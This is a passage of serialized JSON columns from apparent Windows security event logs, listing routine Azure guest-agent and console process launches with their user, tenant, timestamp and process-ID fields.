dc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"NaN\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"/Knx0k1iQMMAkBfESI12QgAwGMRIjXZCALCb+0iNdkIAgJz7SI12QgCQwANLjXZCAPDAA0uNdkIAUEWMTI12QgDwRYxMjXZCAFAIxEyNdkIAMAnETI12QgBQT0JQjXZCANBQQlCNdkIAoC16UI12QgBALnpQjXZCAJAU7VONdkIAMBXtU412QgAQcCVUjXZCAOBwJVSNdkIAkEOYV412QgAwRJhXjXZCADAv0FeNdkIAEDDQV412QgCA40JbjXZCACDkQluNdkIAkD17W412QgBgPntbjXZCAPAS7l6NdkIAkBPuXo12QgAQryZfjXZCALCvJl+NdkIA4KqeX412QgCwq55fjXZCANCImWKNdkIA4ImZYo12QgDwetJijXZCAJB70mKNdkIAkHNFZo12QgBwdEVmjXZCAJB2fmaNdkIAcHd+Zo12QgAQXfFpjXZCAPBd8WmNdkIAUHkqao12QgBQeipqjXZCAFCwE0WNdkIAILETRY12QgCwTFRFjXZCAJBNVEWNdkIAMGqdbY12QgAQa51tjXZCAND61W2NdkIAsPvVbY12QgBw40hxjXZCAEDkSHGNdkIA4B6CcY12QgBQIIJxjXZCAPBvOXSNdkIAkHA5dI12QgDQFfV0jXZCAHAW9XSNdkIAUCotdY12QgDwKi11jXZCANAvoHiNdkIAcDCgeI12QgBQaNh4jXZCADBp2HiNdkIAMFJLfI12QgDQUkt8jXZCAEDQg3yNdkIA4NCDfI12QgCgpPZ/jXZCALCl9n+NdkIAgJYugI12QgAgly6AjXZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[75]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAkBfESI12QgAwGMRIjXZCALCb+0iNdkIAgJz7SI12QgCQwANLjXZCAPDAA0uNdkIAUEWMTI12QgDwRYxMjXZCAFAIxEyNdkIAMAnETI12QgBQT0JQjXZCANBQQlCNdkIAoC16UI12QgBALnpQjXZCAJAU7VONdkIAMBXtU412QgAQcCVUjXZCAOBwJVSNdkIAkEOYV412QgAwRJhXjXZCADAv0FeNdkIAEDDQV412QgCA40JbjXZCACDkQluNdkIAkD17W412QgBgPntbjXZCAPAS7l6NdkIAkBPuXo12QgAQryZfjXZCALCvJl+NdkIA4KqeX412QgCwq55fjXZCANCImWKNdkIA4ImZYo12QgDwetJijXZCAJB70mKNdkIAkHNFZo12QgBwdEVmjXZCAJB2fmaNdkIAcHd+Zo12QgAQXfFpjXZCAPBd8WmNdkIAUHkqao12QgBQeipqjXZCAFCwE0WNdkIAILETRY12QgCwTFRFjXZCAJBNVEWNdkIAMGqdbY12QgAQa51tjXZCAND61W2NdkIAsPvVbY12QgBw40hxjXZCAEDkSHGNdkIA4B6CcY12QgBQIIJxjXZCAPBvOXSNdkIAkHA5dI12QgDQFfV0jXZCAHAW9XSNdkIAUCotdY12QgDwKi11jXZCANAvoHiNdkIAcDCgeI12QgBQaNh4jXZCADBp2HiNdkIAMFJLfI12QgDQUkt8jXZCAEDQg3yNdkIA4NCDfI12QgCgpPZ/jXZCALCl9n+NdkIAgJYugI12QgAgly6AjXZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[75]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"__cmd_line$$\":[\"nan\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\"],\"__proc_id$$\":[\"PID: 0x1994\",\"PID: 0x123c\",\"PID: 0x20b0\",\"PID: 0xccc\",\"PID: 0x14ec\",\"PID: 0xda8\",\"PID: 0x1cfc\",\"PID: 0x7fc\",\"PID: 0x108c\",\"PID: 0x798\",\"PID: 0x22e0\",\"PID: 0x172c\",\"PID: 0x1dec\",\"PID: 0xe2c\",\"PID: 0x1080\",\"PID: 0xb14\",\"PID: 0x17ec\",\"PID: 0x1898\",\"PID: 0x1058\",\"PID: 0xe1c\",\"PID: 